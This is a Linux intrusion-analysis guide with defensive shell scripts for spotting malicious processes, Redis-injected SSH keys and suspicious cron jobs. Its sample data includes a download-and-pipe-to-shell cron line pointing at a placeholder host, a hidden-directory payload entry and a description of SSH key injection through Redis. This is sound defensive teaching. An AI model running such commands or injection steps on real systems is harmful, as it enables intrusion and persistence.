Linux Intrusion Analysis (1): How to Find Malicious Processes and Files

1. Check CPU and memory usage

top
Press uppercase "P" to sort by CPU usage and note the processes and PIDs that are consuming the most.

2. View the host's network connections with netstat

netstat -anp
netstat -antlp
netstat -anltp | more
netstat -tunpl
netstat -antlp | grep -v -e nginx -e "140.205" -e "192.168.0.3:80 " -e "mem"
(the grep -v filters out known-good nginx connections and expected addresses so only the unexplained connections remain)

netstat -ltpe: the -e (extended) option combined with -p shows both the process name and the user name.
Note: if you use -n and -e together, the User column shows the user's numeric ID, not the username.

3. View the gateway with netstat

netstat -rn

4. Check which host ports are open from outside the host

nmap -Pn 1.2.3.4 -p 1-65535
(run from a separate machine against the host's address; 1.2.3.4 is a placeholder)
Use the list of open ports to narrow down the possible intrusion paths.

5. Is there unauthorized access to Redis on port 6379?

(1) From another machine on the public network, run "telnet <host IP> 6379". If the connection succeeds, Redis is exposed to unauthorized access.
(2) On the host itself, test for unauthorized access with redis-cli:
[root@eapple-nfb ~]# redis-cli
127.0.0.1:6379> keys *
(3) ps -ef | grep 6379: check whether Redis was started by the root user. If so, suspect unauthorized Redis access. It is recommended to run Redis as a non-root user and set a password.
(4) SSH key injected through Redis: check whether the /root/.ssh directory contains key files such as authorized_keys. If such a file exists and was not created by the user, suspect unauthorized Redis access.
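As an added example (not from the original post), a shell check for the case in step (4): it looks for signs that an authorized_keys file was written by Redis rather than by hand. The verdict strings and the sample files it creates under mktemp are my own constructions.

```shell
#!/bin/sh
# Added example (not from the original post): check an authorized_keys file for
# signs that it was written by Redis (via "config set dir" + "save") rather than
# by a user. A Redis RDB dump starts with the magic bytes "REDIS" plus a 4-digit
# version, and the injected key sits between binary RDB bytes, so the file
# contains non-printable characters and lines that are not valid OpenSSH key
# entries. Prints a verdict; exit status 1 when suspicious.
check_authorized_keys() {
    f=$1
    [ -f "$f" ] || { echo "absent"; return 0; }
    # 1. RDB magic anywhere in the file (-a: treat the file as text even if binary)
    if LC_ALL=C grep -aq 'REDIS[0-9][0-9][0-9][0-9]' "$f"; then
        echo "suspicious: contains Redis RDB header"; return 1
    fi
    # 2. non-printable bytes; a genuine authorized_keys is plain ASCII text
    if LC_ALL=C grep -aq '[^[:print:][:space:]]' "$f"; then
        echo "suspicious: contains non-printable bytes"; return 1
    fi
    # 3. every remaining line must be blank, a comment, or an OpenSSH key entry
    #    (options such as command="..." may precede the key type)
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in
            ''|'#'*) ;;
            *"ssh-rsa "*|*"ssh-ed25519 "*|*"ecdsa-sha2-nistp"*|*"sk-ssh-ed25519"*|*"sk-ecdsa"*) ;;
            *) echo "suspicious: unexpected line: $line"; return 1 ;;
        esac
    done < "$f"
    echo "clean"; return 0
}

# Constructed samples for demonstration (written to a temporary directory).
demo=$(mktemp -d)
printf 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyOnly admin@host\n' > "$demo/good"
# Shape of a Redis-written file: RDB header, padding, the injected key, binary tail.
printf 'REDIS0009\372\011redis-ver\n\n\nssh-rsa AAAAB3ExampleKey injected\n\n\n\377\001\n' > "$demo/bad"
for s in good bad; do
    if check_authorized_keys "$demo/$s"; then rc=0; else rc=1; fi
    echo "$s -> exit $rc"
done
rm -rf "$demo"
```

On a live host, run it as `check_authorized_keys /root/.ssh/authorized_keys` and compare any flagged key against what the administrator actually installed.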

6. Find the process file location from the PID

(1) ps -ef | grep 31685
ps aux | grep zabbix

(2) Using /proc/<PID>
ls -l /proc/<PID> shows a line "exe -> /xxx/xxxx/xxxxx"; the link target is the path of the process executable.
ls -l /proc/<PID>/exe
file /proc/<PID>/exe

(3) lsof -p <PID>
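An added example (not part of the original post) that automates steps (1) to (3): it resolves /proc/<PID>/exe, cwd and cmdline for one PID and then walks /proc for executables that were deleted from disk or run from scratch or hidden directories. The classify_exe_path helper and its verdict strings are my own; it runs as any user but sees fewer processes than root.

```shell
#!/bin/sh
# Added example (not from the original post): inspect a PID through /proc and
# classify where its executable lives. Red flags when hunting: the exe link
# ends in "(deleted)" (binary removed after launch, so find will not locate it),
# or it runs from a world-writable scratch directory (/tmp, /var/tmp, /dev/shm)
# or a hidden directory (a lead, not proof: ~/.local/bin is legitimate too).
# classify_exe_path works on the resolved path string alone, so it can be
# exercised without root or a live process.
classify_exe_path() {
    case "$1" in
        *" (deleted)")                echo "suspicious: binary deleted on disk" ;;
        /tmp/*|/var/tmp/*|/dev/shm/*) echo "suspicious: runs from scratch dir" ;;
        */.*)                         echo "suspicious: hidden path component" ;;
        "")                           echo "unknown: exe link unreadable (kernel thread or no permission)" ;;
        *)                            echo "ok" ;;
    esac
}

# Show what the page reads off /proc/<PID> by hand, plus the verdict.
inspect_pid() {
    pid=$1
    exe=$(readlink "/proc/$pid/exe" 2>/dev/null)
    cwd=$(readlink "/proc/$pid/cwd" 2>/dev/null)
    cmd=$(tr '\0' ' ' 2>/dev/null < "/proc/$pid/cmdline")
    printf 'pid=%s exe=%s cwd=%s\n  cmdline: %s\n  verdict: %s\n' \
        "$pid" "${exe:-?}" "${cwd:-?}" "$cmd" "$(classify_exe_path "$exe")"
    # the on-disk file is what you then check with ls -l (mtime) and file
    [ -n "$exe" ] && ls -l "$exe" 2>/dev/null
    return 0
}

# Walk every process and print only those the classifier rates suspicious.
# Unreadable exe links (kernel threads, other users' processes) are skipped;
# run as root for full coverage.
hunt_all() {
    for d in /proc/[0-9]*; do
        v=$(classify_exe_path "$(readlink "$d/exe" 2>/dev/null)")
        case "$v" in ok|unknown*) ;; *) printf '%s %s\n' "${d#/proc/}" "$v" ;; esac
    done
}

inspect_pid "$$"   # the current shell, so the script demonstrates itself
hunt_all
```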

7. Find the file location from the program name

find / -name infod
find / -name " *"
find / -name ". *"
find / -name ".. *"
The last three patterns look for names that begin with a space, ". " or ".. ", a common trick for hiding files and directories in listings.

8. Find the locations of program files associated with a user

(1) find / -user linux | grep -v '/home/ubuntu'
(2) lsof -u ubuntu

9. View the last modification time of a program

ll /path/to/program
ll is an alias for ls -l.
ls lists the files in the current directory; "ls -l" lists them with detailed information (permissions, owner, size, modification time).

ll /usr/sbin/httpd
-rwxr-xr-x 1 root root 523568 Oct 12 2017 /usr/sbin/httpd

10. Process tree: pstree to view child processes

yum install psmisc
pstree -p
pstree -p -a

Installation on three systems:

# On Mac OS: brew install pstree
# On Fedora/Red Hat/CentOS: yum install psmisc   (pstree is part of the psmisc package)
# On Ubuntu/Debian (APT): apt-get install psmisc

11. Automatic startup items

(1) Check the startup items
chkconfig --list or cat /etc/rc.local

(2) Scheduled task scripts
crontab -l to view the current user's scheduled tasks
crontab -l -u oracle to view the scheduled tasks of the oracle user

Cron file directories: check /etc/crontab, /etc/cron.d, /etc/cron.daily, /etc/cron.hourly, /etc/cron.monthly and /etc/cron.weekly for scripts or programs.

Explanation of the crontab -l output
    */30 * * * * /var/tmp/". "/c
    {minute} {hour} {day-of-month} {month} {day-of-week} {full-path-to-shell-script}
    o minute: range 0 - 59
    o hour: range 0 - 23
    o day-of-month: range 0 - 31
    o month: range 1 - 12. 1 is January, 12 is December.
    o day-of-week: range 0 - 7. Sunday can be 0 or 7.

    "*/30" means every 30 units; here it means every 30 minutes.
    In this example the command lives under /var/tmp in a directory named ". " (dot space), which is easy to overlook in a listing.
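An added example (not from the original post) that audits crontab lines the way you would read `crontab -l` output by hand, including the /var/tmp/". "/c entry above: it separates the schedule from the command and flags commands in scratch or hidden directories, the dot-space directory trick, and download-and-pipe-to-shell. The flag names and the sample crontab are my own constructions.

```shell
#!/bin/sh
# Added example (not from the original post): audit crontab lines. Each line is
# split into the schedule (five fields, or an @keyword) and the command; the
# command is checked for the red flags this section describes.
# Output: "<schedule> | <command> | <flags or ok>".
audit_cron_line() {
    line=$1
    case "$line" in
        ''|'#'*) return 0 ;;            # blank or comment
        [A-Za-z_]*=*) return 0 ;;       # environment assignment, e.g. MAILTO=root
    esac
    set -f; set -- $line; set +f        # split on whitespace without globbing the '*'
    case "$1" in
        @*) [ $# -ge 2 ] || return 0; sched=$1; shift ;;
        *)  [ $# -ge 6 ] || { echo "malformed | $line | ?"; return 0; }
            sched="$1 $2 $3 $4 $5"; shift 5 ;;
    esac
    cmd="$*"
    flags=
    case "$cmd" in */tmp/*|*/var/tmp/*|*/dev/shm/*) flags="$flags scratch-dir" ;; esac
    case "$cmd" in *'". "'*|*"'. '"*)            flags="$flags dot-space-dir" ;; esac
    case "$cmd" in */.[!./]*)                   flags="$flags hidden-path" ;; esac
    case "$cmd" in *curl*'|'*sh*|*wget*'|'*sh*)  flags="$flags download-pipe-shell" ;; esac
    flags=${flags# }
    printf '%s | %s | %s\n' "$sched" "$cmd" "${flags:-ok}"
}

# Reads crontab text on stdin, e.g.  crontab -l -u oracle | audit_crontab
audit_crontab() {
    while IFS= read -r l; do audit_cron_line "$l"; done
}

# Constructed sample, not a real crontab; the third line is the one shown above.
sample='# user crontab
MAILTO=root
*/30 * * * * /var/tmp/". "/c
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -fsSL http://example.invalid/a.sh | sh
@reboot /home/app/.config/.d/run.sh'
printf '%s\n' "$sample" | audit_crontab
```

The same function works on the files under /etc/cron.d and on /etc/crontab once the extra user field those system crontabs carry is taken into account.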

12. Trojan identification websites: Weibu Online (ThreatBook) / VirusTotal, to check suspicious files and IPs

https://x.threatbook.cn/
www.virustotal.com
http://r.virscan.org

13. Capture packets and analyze traffic

(1) Capture TCP packets
tcpdump -i eth0 -w tel.pcap
(2) Capture HTTP packets
tcpdump -XvvennSs 0 -i eth0 'tcp[20:2]=0x4745 or tcp[20:2]=0x4854'
The filter matches packets whose TCP payload begins with "GE" (0x4745, as in GET) or "HT" (0x4854, as in HTTP/1.x responses). tcp[20:2] is the start of the payload only when the TCP header carries no options, so packets with a longer header are missed.

14. Antivirus software: ClamAV

(1) Source: yum install epel-release

(2) Software: yum install clamav-server clamav-data clamav-update clamav-filesystem clamav clamav-scanner-systemd clamav-devel clamav-lib clamav-server-systemd -y

(3) Update the virus database: freshclam

  • To scan the home directories of all users, use clamscan -r /home
  • To scan all files on the computer and display the results for every file, use clamscan -r /
  • To scan all files on the computer and display only the files found to be infected, use clamscan -r --bell -i /

# --bell seems useless here: because /sys/ is scanned, the run reports 4000+ errors such as
LibClamAV Warning: fmap_readpage: pread fail: asked for 4077 bytes @ offset 19, got 0
WARNING: Can't open file /sys/bus/hid/drivers/topseed/bind: Permission denied

Note: clamscan --exclude-dir=/sys/ -i -r /
Because of the special nature of the /sys/ directory, scanning it generates many errors; simply skip it.
-i reports only infected files, -r also scans subdirectories, and / is the root directory.

15. The chkrootkit tool checks for rootkits and other signs of intrusion

https://www.lvtao.net/server/chkrootkit.html
